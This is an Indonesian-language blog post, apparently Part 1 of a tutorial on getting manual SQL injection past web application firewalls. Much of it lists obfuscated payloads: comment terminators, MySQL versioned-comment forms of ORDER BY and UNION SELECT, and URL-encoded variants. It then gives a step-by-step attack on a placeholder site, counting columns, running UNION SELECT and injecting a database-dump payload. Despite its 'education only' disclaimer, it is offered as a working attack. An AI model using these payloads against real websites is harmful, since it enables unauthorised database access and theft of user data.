Beranda
Postingan

Mengenal & Bagaimana Cara Bypass SQL Injection (Manual) || Part 1



Halo kawan² Bagaimana kabarnya pastinya baik baik yahh :),,,Oke pada kali ini mimin akan memberi pengetahuan bagaimana cara bypass sql injection (manual). oke  pertama-pertama saya berterima kasih kepada kalian semua yang sudah mengunjungi blog kami,,,Oke tanpa basa basi kita Akan Lanjut Ke pembahasan nya guys,,,Nahh mengapa sih kita pada saat melakukan sql injection pasti Ketemunya 403 Forbiden,Error 503 Service Unavailable,Dan porbiden lain-lainnya,,,Nahh Bagaimana Cara Bypassnya???


Simak Guys!!!!


Oke Apakah kalian Punya Semacam Tools DH Hackbar Atau Hackbar???...Jika Belum punya silahkan download aplikasinya di link Di sini. Nahh Setelah Download Aplikasinya kawan² Aku akan Mengasih sekaligus mengenal Bypass SQLi,,,Sebagai berikut;


1. Bypass URL Balancer,,,URL Balancer Pada Umumnya dalam SQL Injection manual adalah --+- ,,,Nahh kaka akan kasih bypass SQLi manual seperti apa???,,,Sebagai Berikut;

-- -              -- /

-- \              -- :

-- ;              %27 atau '

-- -/*           %23

%0a           %23%23

;%00          %60

%90            --


Itu adalah bypass URL Balancernya...


2. Bypass Order By,,,Order By Pada Umunya dalam SQLi Manual adalah order+by+1--+-,,,apa saja bypassnya???,,,Sebagai Berikut;


order by 1 (Dengan Cara Spasi Juga Bisa bro

                     Saya biasanya menggunakan

                     Spasi agar Tidak Ribet hehehe)

/*!50000ORDER*/ /*!50000BY*/

/*!50000ORDER/**_**/*/ /*!50000BY/**_**/*/

/*!50000GROUP/**_**/*/ /*!50000BY/**_**/*/

%23%0AORDER%23%0ABY%23%0A

%0AORDER%0ABY%0A

AND MOD(52,12) /*!50000ORDER*/ BY

AND MOD(29,9) /*!50000ORDER/**_**/*/ /*!50000BY/**_**/*/


Itu adalaj Bypass Order Bynya Guys


3. Bypass Union Select,,,Union Select Pada Umumnya adalah union+select+1,2,3--+-,,,Apa saja Bypass Union select???,,,Sebagau Berikut;


Union select 1

/*!50000union*/ /*!50000seLect*/

/*!50000union/**_**/*/ /*!50000seLect/**_**/*/


Selebihnya ada di Tools DH Hackbar Oke


Kaka akan lanjut Cara Membypassnya??? simak :D


1. Pada saat kita melakukan %27 atau ' Pasti akan muncul seperti ini :


Nahh Kita Pasti sangat kesal hahahaha,,,Nah apa yang kita lakukan Selanjutnya Kita Cukup Menghilangkan tanda %27 nya saja....

Contoh : www.target.com/index.php?id=1'

Solusi : www.target.com/index.php?id=1


2. Kita melakukan Bypass Order Caranya,,,Seperti ini


www.target.com/index.php?id=1 /*!50000ORDER*/ /*!50000BY/**_**/*/ 1-- -/*

Maka website akan kembali seperti semula setelah itu kalian maenin deh angkanya contoh yang tadinya order by 1 di rubah kedua dan seterusnya ya guys sampai error,,,Nah Bila error nya di angka 6 Langkah selanjutnya ada di nomer 3 yaitu bypass union select.


3. Langkah selanjutnya,,,Karna Error di angka 6 kita untuk melakukan bypass union select seperti ini;


www.target.com/index.php?id=1 /*50000union*/ /*!50000seLect/**_**/*/ 1,2,3,4,5-- -


Maka akan muncuk togelnya guys...


4. Lalu tempelkan dios di angka Togel...


Cukup segitu aja ya guys Semoga kalian paham,,,Dan ini hanya sebagai Edukasi yahh...Terima Kasih :D





Posting Komentar